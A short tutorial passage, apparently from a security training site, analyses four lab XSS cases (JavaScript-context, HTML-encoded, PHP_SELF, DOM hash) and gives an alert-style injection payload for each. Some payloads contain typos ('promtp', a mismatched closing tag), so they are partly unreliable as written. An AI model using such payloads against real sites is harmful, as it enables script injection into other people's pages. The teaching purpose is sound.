Part 2: XSS Code Analysis and Exploitation

Hello Cybrarians, once again,In this article, we continue our code analysis and exploitation of XSS from Part 1. If you haven't already read it, please do. Let's begin...Example 6:As we see, our code is now completely different for the previous examples. In this one, our code running inside JavaScript so in our payload, we don't have to specified the language using script tags ( <script> , javascript: , etc). We also see no sanitization in place.Our payload will look like:";promtp('ex6');"  Example 7:So here, it's starts getting little bit more serious, as we see HTML encoding in place and we cannot use doublequotes (" ")Our payload will look like:';alert('ex7');'  Example 8:The HTML encoding is still in place and also the application uses the php_self parameter, which trusts the user input and let's us execute our code. But, we must first close the already running one.Our payload will look like:"><script>alert('ex8')</script>  Example 9:Here, we have DOM-based XSS and what actually happens is that every request is looking for the hash.substring (#)Our payload will look like:# <script>alert('ex9')</alert>

---

That's for now. Use the form below for questions and comments